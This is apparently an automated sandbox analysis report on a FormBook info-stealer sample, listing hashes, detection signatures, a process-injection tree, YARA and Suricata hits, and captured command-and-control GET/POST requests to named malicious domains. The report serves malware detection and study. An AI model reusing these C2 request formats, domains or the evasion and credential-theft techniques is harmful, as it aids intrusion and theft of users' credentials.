Windows Analysis Report
PGK60fNNCZ.exe

Overview

General Information

Sample name: PGK60fNNCZ.exe
renamed because original name is a hash value
Original sample name: daae3c4404ba8fc0f82790b718f5a4b13f49e2e5388471fe72da8c8eba5de290.exe
Analysis ID: 1588678
MD5: be729fe26e81cb5d5ab76fa5a235accb
SHA1: 30c08240bae5fe587671eb22edb703e6da07e909
SHA256: daae3c4404ba8fc0f82790b718f5a4b13f49e2e5388471fe72da8c8eba5de290
Tags: exe, Formbook, user-adrian__luca
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PGK60fNNCZ.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\PGK60fNNCZ.exe" MD5: BE729FE26E81CB5D5AB76FA5A235ACCB)
    • PGK60fNNCZ.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\PGK60fNNCZ.exe" MD5: BE729FE26E81CB5D5AB76FA5A235ACCB)
    • PGK60fNNCZ.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\PGK60fNNCZ.exe" MD5: BE729FE26E81CB5D5AB76FA5A235ACCB)
    • PGK60fNNCZ.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\PGK60fNNCZ.exe" MD5: BE729FE26E81CB5D5AB76FA5A235ACCB)
      • QxPduTOtZWkp.exe (PID: 1200 cmdline: "C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cacls.exe (PID: 8092 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • QxPduTOtZWkp.exe (PID: 6208 cmdline: "C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
6.2.PGK60fNNCZ.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.PGK60fNNCZ.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T04:06:30.782095+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 51320 | 74.208.236.156 | 80 | TCP
2025-01-11T04:06:54.258368+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 51324 | 84.32.84.32 | 80 | TCP
2025-01-11T04:07:07.423091+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 51328 | 13.248.169.48 | 80 | TCP
2025-01-11T04:07:20.828709+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 51332 | 66.29.149.46 | 80 | TCP

                AV Detection

                Source: PGK60fNNCZ.exe; ReversingLabs: Detection: 68%
                Source: PGK60fNNCZ.exe; Virustotal: Detection: 79%
                Source: Yara match; File source: 6.2.PGK60fNNCZ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 6.2.PGK60fNNCZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                Source: PGK60fNNCZ.exe; Joe Sandbox ML: detected
                Source: PGK60fNNCZ.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PGK60fNNCZ.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550234246.0000000000C98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550234246.0000000000C98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QxPduTOtZWkp.exe, 00000008.00000000.1787927028.00000000007FE000.00000002.00000001.01000000.0000000D.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2548675572.00000000007FE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: PGK60fNNCZ.exe, 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1865016088.0000000003485000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1867375010.0000000003632000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PGK60fNNCZ.exe, PGK60fNNCZ.exe, 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1865016088.0000000003485000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1867375010.0000000003632000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cacls.exe; Code function: 9_2_00BEC940 FindFirstFileW,FindNextFileW,FindClose,9_2_00BEC940
                Source: C:\Windows\SysWOW64\cacls.exe; Code function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h, 9_2_00BD9E50
                Source: C:\Windows\SysWOW64\cacls.exe; Code function: 4x nop then xor eax, eax, 9_2_00BD9E50
                Source: C:\Windows\SysWOW64\cacls.exe; Code function: 4x nop then pop edi, 9_2_00BDE4AE
                Source: C:\Windows\SysWOW64\cacls.exe; Code function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h, 9_2_00BD9E46
                Source: C:\Windows\SysWOW64\cacls.exe; Code function: 4x nop then mov ebx, 00000004h, 9_2_036004BE

                Networking

                Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51320 -> 74.208.236.156:80
                Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51324 -> 84.32.84.32:80
                Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51328 -> 13.248.169.48:80
                Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51332 -> 66.29.149.46:80
                Source: DNS query: www.aktmarket.xyz
                Source: global traffic; TCP traffic: 192.168.2.7:51182 -> 1.1.1.1:53
                Source: Joe Sandbox View; IP Address: 13.248.169.48
                Source: Joe Sandbox View; IP Address: 84.32.84.32
                Source: Joe Sandbox View; ASN Name: NTT-LT-ASLT
                Source: Joe Sandbox View; ASN Name: ADVANTAGECOMUS
                Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic; HTTP traffic detected: GET /raea/?-pztsZ6x=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp3E/jI7y5iYAByXvyTWq6cDZMSDvdA4QMsGyTH+1ZevuClMSDErjQvhDp&jHc=_xZhxrExRJpXy4 HTTP/1.1 Accept: */* Accept-Language: en-US,en;q=0.9 Host: www.christinascuties.net Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global traffic; HTTP traffic detected: GET /jytl/?-pztsZ6x=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4HtQbsAC9MkV/G3NnAml8OZJy5NH6433LttETR9jiekKwjvXYHWThJEDI&jHc=_xZhxrExRJpXy4 HTTP/1.1 Accept: */* Accept-Language: en-US,en;q=0.9 Host: www.techmiseajour.net Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global traffic; HTTP traffic detected: GET /wb7v/?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT0 HTTP/1.1 Accept: */* Accept-Language: en-US,en;q=0.9 Host: www.aktmarket.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global traffic; HTTP traffic detected: GET /r2k9/?-pztsZ6x=R82aEe+RY/7ruopLPiKRJqOVryxP2PLUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z4XbG+3l1So+gPg3dZW44XObjN+WC+Ppk5idK3Qy4ode17oimlo20fhs9&jHc=_xZhxrExRJpXy4 HTTP/1.1 Accept: */* Accept-Language: en-US,en;q=0.9 Host: www.golivenow.live Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global traffic; DNS traffic detected: DNS query: www.christinascuties.net
                Source: global traffic; DNS traffic detected: DNS query: www.techmiseajour.net
                Source: global traffic; DNS traffic detected: DNS query: www.aktmarket.xyz
                Source: global traffic; DNS traffic detected: DNS query: www.golivenow.live
                Source: global traffic; DNS traffic detected: DNS query: www.iglpg.online
                Source: unknown; HTTP traffic detected: POST /jytl/ HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.techmiseajour.net Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Origin: http://www.techmiseajour.net Referer: http://www.techmiseajour.net/jytl/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 626 Connection: close Date: Sat, 11 Jan 2025 03:06:30 GMT Server: Apache
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:07:13 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:07:15 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:07:18 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html
                Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 03:07:20 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8
                Source: PGK60fNNCZ.exe; String found in binary or memory: http://www.elderscrolls.com/skyrim/characterK
                Source: PGK60fNNCZ.exe; String found in binary or memory: http://www.elderscrolls.com/skyrim/characterT
                Source: PGK60fNNCZ.exe; String found in binary or memory: http://www.elderscrolls.com/skyrim/player
                Source: QxPduTOtZWkp.exe, 0000000C.00000002.2550953930.0000000000F25000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.golivenow.live
                Source: QxPduTOtZWkp.exe, 0000000C.00000002.2550953930.0000000000F25000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.golivenow.live/r2k9/
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cacls.exe, 00000009.00000002.2554684215.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2552511952.000000000358A000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: cacls.exe, 00000009.00000002.2554684215.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2552511952.000000000358A000.00000004.00000001.00040000.00000000.sdmp; String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033N
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033A2000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cacls.exe, 00000009.00000003.2048493633.000000000813F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
                Source: cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0042CE23 NtClose,6_2_0042CE23
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2B60 NtClose,LdrInitializeThunk,6_2_00FD2B60
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00FD2C70
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00FD2DF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD35C0 NtCreateMutant,LdrInitializeThunk,6_2_00FD35C0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD4340 NtSetContextThread,6_2_00FD4340
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD4650 NtSuspendThread,6_2_00FD4650
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2AF0 NtWriteFile,6_2_00FD2AF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2AD0 NtReadFile,6_2_00FD2AD0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2AB0 NtWaitForSingleObject,6_2_00FD2AB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2BF0 NtAllocateVirtualMemory,6_2_00FD2BF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2BE0 NtQueryValueKey,6_2_00FD2BE0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2BA0 NtEnumerateValueKey,6_2_00FD2BA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2B80 NtQueryInformationFile,6_2_00FD2B80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2CF0 NtOpenProcess,6_2_00FD2CF0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2CC0 NtQueryVirtualMemory,6_2_00FD2CC0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2CA0 NtQueryInformationToken,6_2_00FD2CA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2C60 NtCreateKey,6_2_00FD2C60
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2C00 NtQueryInformationProcess,6_2_00FD2C00
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2DD0 NtDelayExecution,6_2_00FD2DD0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2DB0 NtEnumerateKey,6_2_00FD2DB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2D30 NtUnmapViewOfSection,6_2_00FD2D30
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2D10 NtMapViewOfSection,6_2_00FD2D10
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2D00 NtSetInformationFile,6_2_00FD2D00
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2EE0 NtQueueApcThread,6_2_00FD2EE0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2EA0 NtAdjustPrivilegesToken,6_2_00FD2EA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2E80 NtReadVirtualMemory,6_2_00FD2E80
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2E30 NtWriteVirtualMemory,6_2_00FD2E30
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2FE0 NtCreateFile,6_2_00FD2FE0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2FB0 NtResumeThread,6_2_00FD2FB0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2FA0 NtQuerySection,6_2_00FD2FA0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2F90 NtProtectVirtualMemory,6_2_00FD2F90
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2F60 NtCreateProcessEx,6_2_00FD2F60
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD2F30 NtCreateSection,6_2_00FD2F30
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD3090 NtSetValueKey,6_2_00FD3090
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD3010 NtOpenDirectoryObject,6_2_00FD3010
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD39B0 NtGetContextThread,6_2_00FD39B0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD3D70 NtOpenThread,6_2_00FD3D70
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD3D10 NtOpenProcessToken,6_2_00FD3D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03854340 NtSetContextThread,LdrInitializeThunk,9_2_03854340
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03854650 NtSuspendThread,LdrInitializeThunk,9_2_03854650
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03852BA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03852BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03852BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852B60 NtClose,LdrInitializeThunk,9_2_03852B60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852AD0 NtReadFile,LdrInitializeThunk,9_2_03852AD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852AF0 NtWriteFile,LdrInitializeThunk,9_2_03852AF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852FB0 NtResumeThread,LdrInitializeThunk,9_2_03852FB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852FE0 NtCreateFile,LdrInitializeThunk,9_2_03852FE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852F30 NtCreateSection,LdrInitializeThunk,9_2_03852F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03852E80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03852EE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852DD0 NtDelayExecution,LdrInitializeThunk,9_2_03852DD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03852DF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03852D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03852D30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03852CA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852C60 NtCreateKey,LdrInitializeThunk,9_2_03852C60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03852C70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038535C0 NtCreateMutant,LdrInitializeThunk,9_2_038535C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038539B0 NtGetContextThread,LdrInitializeThunk,9_2_038539B0
